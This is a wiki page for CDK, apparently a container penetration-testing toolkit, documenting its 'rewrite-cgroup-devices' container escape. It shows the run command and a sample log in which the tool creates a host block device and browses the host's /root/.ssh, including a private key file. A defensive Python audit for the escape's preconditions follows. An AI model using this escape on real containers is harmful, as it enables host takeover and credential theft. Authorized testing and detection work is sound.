Exploit: rewrite cgroup devices

neargle edited this page Jan 25, 2021 · 3 revisions

Exploit: rewrite-cgroup-devices

Rewrite /sys/fs/cgroup/devices/devices.allow from inside the current container to gain access to files on the host, escaping a privileged container.

Usage

./cdk run rewrite-cgroup-devices

Example

➜  /tmp docker run -it -v /tmp:/tmp --cap-add="SYS_ADMIN" near/neo4j-test bash
# ./cdk run rewrite-cgroup-devices
2021/01/23 07:28:10 generate shell exploit: /tmp/rewrite-cgroup-devices-exp-dylqyn.sh
Execute Shell:/tmp/rewrite-cgroup-devices-exp-dylqyn.sh finished with output:
2021/01/23 07:28:10 get /sys/fs/cgroup/devices/devices.allow inode id: 955171887
2021/01/23 07:28:10 find cgroup devices.allow file: /sys/fs/cgroup/cgneartest/docker/c254a346291562776f08fd135c267e64eef0f6908578a9eebd97274d543a865f/devices.allow
2021/01/23 07:28:10 get virtblk device ID: 252
2021/01/23 07:28:10 generate shell exploit: /tmp/device-mknod-cmezii.sh
Execute Shell:/tmp/device-mknod-cmezii.sh finished with output:
2021/01/23 07:28:12 now, run 'debugfs cdk_mknod_result' to browse host files.

# debugfs cdk_mknod_result
debugfs 1.42.13 (17-May-2015)
debugfs:  ls -l /root/.ssh
 393231   40700 (2)      0      0    4096 22-Nov-2020 15:59 .
  52566   40550 (2)      0      0    4096 23-Jan-2021 07:27 ..
 395870  100600 (1)      0      0     746 29-May-2020 06:11 authorized_keys
 395829  100644 (1)      0      0     247  7-Aug-2020 07:01 config
 395860  100644 (1)      0      0     725 16-Dec-2020 10:53 known_hosts
 393227  100600 (1)      0      0    1675 22-Nov-2020 15:59 id_rsa
 395831  100644 (1)      0      0     391 22-Nov-2020 15:59 id_rsa.pub
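
A defender-side check for the two preconditions the run above relies on (the added SYS_ADMIN capability and a devices cgroup that permits block-device access), as an added example that is not part of the CDK wiki or CDK's code. The sample inputs are constructed, the function names are hypothetical, and it assumes cgroup v1, where the devices controller exposes devices.allow and devices.list.

```python
import re

CAP_SYS_ADMIN, CAP_MKNOD = 21, 27  # bit numbers from linux/capability.h

# Constructed samples: /proc/<pid>/status excerpts and cgroup v1 devices.list content.
STATUS_DEFAULT = "Name:\tbash\nCapEff:\t00000000a80425fb\n"    # Docker default capability set
STATUS_SYS_ADMIN = "Name:\tbash\nCapEff:\t00000000a82425fb\n"  # same set plus SYS_ADMIN
DEVICES_DEFAULT = "c 1:3 rwm\nc 1:5 rwm\nc *:* m\nb *:* m\n"   # block devices: mknod only
DEVICES_REWRITTEN = "a *:* rwm\n"                              # state after an 'a' rule is allowed


def effective_caps(status_text):
    """Return the effective capability bitmask from /proc/<pid>/status text."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.M)
    if m is None:
        raise ValueError("no CapEff line found")
    return int(m.group(1), 16)


def has_cap(mask, bit):
    return bool((mask >> bit) & 1)


def readable_block_rules(devices_list_text):
    """Return devices.list rules that grant read or write on block devices."""
    rules = []
    for line in devices_list_text.splitlines():
        fields = line.split()
        if len(fields) != 3:          # expected form: "<type> <major>:<minor> <access>"
            continue
        dev_type, _dev_id, access = fields
        if dev_type in ("a", "b") and set(access) & {"r", "w"}:
            rules.append(line.strip())
    return rules


def audit(status_text, devices_list_text):
    """Return a list of findings; an empty list means neither precondition is present."""
    findings = []
    mask = effective_caps(status_text)
    if has_cap(mask, CAP_SYS_ADMIN):
        mknod = has_cap(mask, CAP_MKNOD)
        findings.append(f"CAP_SYS_ADMIN is effective (CAP_MKNOD effective: {mknod})")
    for rule in readable_block_rules(devices_list_text):
        findings.append(f"devices.list grants block-device read/write: {rule!r}")
    return findings


if __name__ == "__main__":
    for finding in audit(STATUS_SYS_ADMIN, DEVICES_REWRITTEN):
        print(finding)
```

On a live host, feed it the contents of /proc/<pid>/status for the container's init process and the devices.list file of that container's cgroup.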
